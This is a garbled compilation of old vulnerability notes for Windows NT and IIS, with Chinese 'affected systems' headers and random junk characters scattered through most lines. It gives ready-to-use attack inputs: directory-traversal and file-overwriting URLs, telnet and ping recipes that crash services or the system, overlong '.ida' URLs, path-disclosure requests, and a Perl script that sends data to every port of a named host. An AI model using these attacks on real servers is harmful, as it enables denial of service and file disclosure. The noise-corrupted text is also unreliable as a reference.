受影响系统:4.0,iis 1.0
( I1 D* L2 S* b+ A" k; EA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
2 @8 Z5 i: D) {# z9 T! [
) x3 |6 X" b+ a( ?7 F' OA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
: a6 Y; C2 B0 D: \! J3 w% G) W' x J
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
$ g+ \! S" T0 u/ X
; m; r m0 n9 j. B0 O9 L3 _--------------------------------------------------------------------9 M" ^3 F0 k. {
' q1 ]2 V/ _2 t8 Y; i
受影响系统:4.0
" b1 \% K4 T+ S* n+ OA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.0 ~% s( z. Z6 y5 {: K! }$ Q
+ a4 y8 ~' s6 \, U. {
If the file 'target.bat' exists, the file will be truncated.
* W, w+ c6 r& P8 T2 f; Y& U' v, v1 l, `' p( f% c
, `# ?6 o' I3 B q
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''./ |" j* b" n, [0 G F# ?
- [" ~0 u5 G8 W1 Q7 @* u' n3 O4 `----------------------------------------------------------------------" C2 f$ p7 y0 D* J/ c+ Q1 d
8 w6 E( a/ M' f5 G" p! h* X# V受影响系统:3.51,4.0
3 H4 e3 }; v" \. _3 ~: Y' wMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.# @6 n- u$ m1 n+ g- H4 x" @
( i8 s" y' d: }! N7 I0 aThe following steps;
7 j) m+ f5 E/ ~+ O( ?% G9 d! y
+ c) x& S" R5 C; y& P+ sTelnet to an NT 4.0 system on port 135 # {8 M" j8 s, K
Type about 10 characters followed by a <CR>
" e% ` n" T s/ e, M% iExit Telnet
9 q+ T2 s5 m! P& G' ?" _results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.& q3 H# A B, @% \; l+ d: f
8 a% A; Q1 Y( y- A% vWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.8 u$ t7 X1 y# m. G# p5 l( O7 n
1 A% ^2 J2 b i) h8 A6 Y4 m
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.9 m- {4 [, Z2 s* q+ _
' L( o* R; [) x4 WIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.' i$ R4 c' A& X7 t( `/ ?7 c1 [
* {# J+ `: [ _9 hThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):( E' v# _% |! G0 {( N& g0 k
9 S# a: l' }: [. ~# u% B" @/*begin poke code*/6 d7 d3 ?, X, _$ Z
6 ?2 b% `! D, P: c8 E+ d
use Socket;
% z% T6 P9 M5 J A0 d6 Guse FileHandle;, L2 e% g; o3 _- M
require "chat2.pl"; s: j9 v8 |8 N
( z$ \ x0 h" A% G* E. V
$systemname = $ARGV[0] && shift;6 {4 Z& f1 k6 e' ] F( w/ x. R, Q
# P2 {4 d+ K/ a8 G5 Z. b# ?2 m
$verbose = 1; # tell me what you're hitting) a& f7 [& i# D: O
$knownports = 1; # don't hit known problem ports
8 E+ |+ E9 s+ @for ($port = $0; $port<65535; $port++)
& Y+ Q( D+ g6 o# h* P' T4 `' j' W, C{
0 i& U. Z/ r% z1 |3 X0 U4 G* z( [0 t3 e, C. c- I! G% @. s+ _" P' A
/ i7 t# F% K% g! ^ [& V7 u
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {3 K" y5 y/ {" I; I! K8 \
next;
- b2 l! n5 y; O) {- I0 e8 z}$ [8 i! u) t: ]7 }$ q
$fh = chat::open_port($systemname, $port);7 T5 H+ q3 m4 A$ \
chat::print ($fh,"This is about ten characters or more");
- x D3 D8 T. v) L9 P/ I1 Lif ($verbose) {
( C$ G9 v. n4 E$ a9 h! U1 Dprint "Trying port: $port\n";* q$ D- Z9 {+ K, X6 ~
} 0 }9 R, j1 |9 T1 x# U7 g# Y
chat::close($fh);
1 p- W& D7 L$ P- k/ b
; a% r. ] {+ M' ^}
- N: k: f9 G7 o$ E" c B3 r( B9 c- f$ T8 C% |- m$ r
7 L1 R' f/ Q6 M8 b
/*end poke code*/
9 [4 g: R+ q$ S: k" S2 E: v/ n# o5 f. a+ d9 T! g, e" U
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
. `1 C- t' n+ k8 B" X9 X# z* c
--------------------------------------------------------------------------------
6 x. H1 ~9 ~% F2 d- M" w- [6 A
受影响系统:4.06 a/ l: ^( F% W: ~- G2 I/ R
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.2 c! D$ a" Q$ `' Q( Y# ?" ]
3 o, Y; I( Q L7 j
This attack causes Dr. Watson to display an alert window and to log an error:
. ]$ ?+ j I/ x# u" R, A% G0 W+ F# T' h4 u# g& M
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
& H% h+ E, C' E/ T* V8 R1 B
' m6 D$ M% d$ s-------------------------------------------------------------------------------- j+ a. j9 S4 @+ V) C1 Y0 _! {
: ^- @; ~1 ?/ A: G: i. }/ u受影响系统:3.51,4.0! [) Y& C3 T6 s
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
0 m" }! k$ w: I3 i( h
) Y/ W0 u2 _5 r7 n+ W* z! y, L5 ^2 @STOP: 0X0000001E* h3 R7 A3 [% ~' @
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
( U+ q8 i3 X2 }5 ?6 b
0 a" i6 V; D, d$ G# O% b! a* v9 g. ^-OR-
! c! \8 g; g& o3 v" _; ^3 T
- u& R2 S+ U- p+ u/ d3 qSTOP: 0x0000000A$ S5 A* y! T+ Y1 q
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
; v! T$ V/ k/ J& { N; D( H. D- g6 L: q, \7 S. I0 |$ G
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.: }0 g g) J* h! t! t
) {' B6 Y) E4 k# W2 I--------------------------------------------------------------------------------. ^$ ?+ X6 f8 ^! p# A/ j6 v9 b
: K j1 W/ Q/ h7 x' u$ i
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). + a$ c9 g* n; L6 Z+ o5 r
: N3 x+ a7 X, z; q6 |0 Z+ \--------------------------------------------------------
) [% t, I; g. J8 q/ [. h. |% U- @7 V2 |7 w
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |